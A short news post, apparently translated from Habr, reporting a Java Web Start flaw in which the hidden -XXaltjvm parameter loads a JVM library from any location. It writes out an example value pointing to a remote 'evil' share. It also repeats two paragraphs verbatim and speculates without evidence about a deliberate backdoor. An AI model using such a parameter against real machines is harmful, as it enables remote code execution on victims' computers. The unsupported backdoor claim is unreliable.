JavaWS found a backdoor
A serious vulnerability was found in the Java Web Start framework, namely the hidden parameter -XXaltjvm (and also -J-XXaltjvm ), with which you can run an alternative version of the JavaVM library (jvm.dll or libjvm.so) located anywhere. That is, you can right now execute a command of the form -XXaltjvm = \\ IP \ evil , and extinguish the light on any Windows machine.
Since JavaWS is part of the JRE, the vulnerability affects all major browsers, including Opera, Firefox, IE, Chrome, etc. Currently, the vulnerability is present only in versions under Windows, whereas in Java SE 6 it is closed several releases ago.
According to experts who have documented this vulnerability in detail , it has been present in JavaWS for a very long time, at least for several years. There are even strange suspicions that someone in the Sun introduced this “feature” specifically for some purpose, too much like a consciously designed backdoor.
Since JavaWS is part of the JRE, the vulnerability affects all major browsers, including Opera, Firefox, IE, Chrome, etc. Currently, the vulnerability is present only in versions under Windows, whereas in Java SE 6 it is closed several releases ago.
According to experts who have documented this vulnerability in detail , it has been present in JavaWS for a very long time, at least for several years. There are even strange suspicions that someone in the Sun introduced this “feature” specifically for some purpose, too much like a consciously designed backdoor.
')
Source: https://habr.com/ru/post/90737/
All Articles